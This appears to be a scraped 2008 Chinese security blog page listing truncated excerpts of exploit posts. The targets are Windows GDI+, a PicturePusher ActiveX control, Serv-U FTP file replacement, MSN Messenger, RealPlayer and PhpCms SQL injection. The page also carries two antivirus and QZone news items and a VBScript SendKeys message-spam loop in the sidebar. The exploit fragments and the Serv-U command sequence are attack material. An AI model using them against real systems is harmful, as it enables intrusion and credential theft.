-
2008-10-12
MS Windows GDI+ Proof of Concept (MS08-052) #2 - [exp'or'0day]
------------------------------------------------------------------------------------------------------------ Operating System: XP SP2 Gdiplus.dll Version: 5.1.3102.2180 Credit: John Smith, Evil Fingers GIF Template Reference: http://www.swe... -
Microsoft Digital Image是一款图像管理处理工具。
其包含的PicturePusher 'PipPPush.dll' ActiveX控件存在设计问题,远程攻击者可以利用漏洞从任意位置下载文件到受影响的电脑。
控件允许构建定制的POST请求实现上传功能,使用浏览器作为代理可以回弹,并通过AddString()方法注入文件名子字段。类似的POST请求如下:
POST /?aaaa=1 HTTP/1.1
Content-Type: multipa... -
2008-10-05
Serv-U 7.2.0.1 ftp file replacement - [exp'or'0day]
#user must have upload permissions
#
#(x) dmnt 2008-10-01
220 Serv-U FTP Server v7.2 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
rnfr any_exist_file.ext
350 F... -
2008-10-05
MSN Messenger的PNG图像缓冲区溢出漏洞下载Shellcoded - [exp'or'0day]
/* * * MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit * Bug discoveried by Core Security Technologies (www.coresecurity.com) * Exploit coded By ATmaCA * Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved. * Web: http:/... -
/*
*****************************************************************************************************************
$ An open security advisory #13 - RealPlayer and Helix Player Remote Format String Exploit
********... -
2008-10-03
QZone新版开始支持Firefox浏览器 - [安全资讯]
今天发现QQZone开始支持Firefox了,就在几天前的某饭局上我还在抱怨:腾讯的产品向来无视Firefox呢。相当长的一段时间,Firefox用户访问QZone会导致假死等奇怪现象,后来,腾讯索性把所有Firefox的访问者重定向到QQ空间的RSS上去。直到今天,终于,我看到了这个域名:new.qzone.qq.com。
不知道这次升级是否是如官方所述的“尊贵5.0”版。但看来看去,觉得腾讯的产品仍然是“权贵味&rdquo... -
2008-10-03
VB100结果揭晓 金山毒霸三冠王 - [安全资讯]
PS:中国杀毒慢慢和国际接轨
9月27日,国际权威病毒研究机构Virus Bulletin发布了其最新一期的VB100测试结果。作为唯一连续2次通过顶级认证的国产杀毒软件,金山毒霸又一次将世界顶级的反病毒权威认证囊入怀中。
据了解,VB100 9月份的测试以微软最新版本windows server 2008为测试平台。金山毒霸2008以100%诊断率,0%的误诊率,在手动扫描及实时监控两种模式下均完全识别Wildlist清单中的所有病毒,... -
2008-10-03
PhpCms2007 sp6 SQL injection 0day - [exp'or'0day]
<? print_r(' -------------------------------------------------------------------------------- PhpCms2007 sp6 "digg" SQL injection/admin credentials disclosure exploit BY T00ls(www.T00ls.net) -------------------------------------------... -
2008-10-03
ESET System Analyzer Tool - [网络攻防]
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#define IMP_VOID __declspec(dllimport) VOID __stdcall
#define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall
#define OBJ_CASE_INSEN... -
2008-09-28
传说中微软最强的漏洞MS08052的利用代码 - [exp'or'0day]
MS Windows GDI+ .ico Remote Division By Zero Application: GDIPLUS.DLL Web Site: http://www.microsoft.com/ Platform: Windows * Bug: Division By Zero Tested agains: XP SP3 fully patched Note: This have nothing to do with http://milw0rm....
3xp-0day'Blog
3xp-0day
个人资料
3exxp-0day
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.AppActivate " 自从上次看到你。
你就好象住在我心理里。怎么也忘不掉 "
for i=1 to 50 '
WScript.Sleep 500
WshShell.SendKeys "^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
next
WshShell.AppActivate " 自从上次看到你。
你就好象住在我心理里。怎么也忘不掉 "
for i=1 to 50 '
WScript.Sleep 500
WshShell.SendKeys "^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
next
日历
搜索
最新日志
- MS Windows GDI+ Proof of Concept (MS08-052) #2
- Microsoft PicturePusher 'PipPPush.dll' ActiveX控件任意文件下载漏洞
- Serv-U 7.2.0.1 ftp file replacement
- MSN Messenger的PNG图像缓冲区溢出漏洞下载Shellcoded
- RealPlayer/Helix Player Remote Format String Exploit (linux)
- QZone新版开始支持Firefox浏览器
- VB100结果揭晓 金山毒霸三冠王
- PhpCms2007 sp6 SQL injection 0day
- ESET System Analyzer Tool
- 传说中微软最强的漏洞MS08052的利用代码
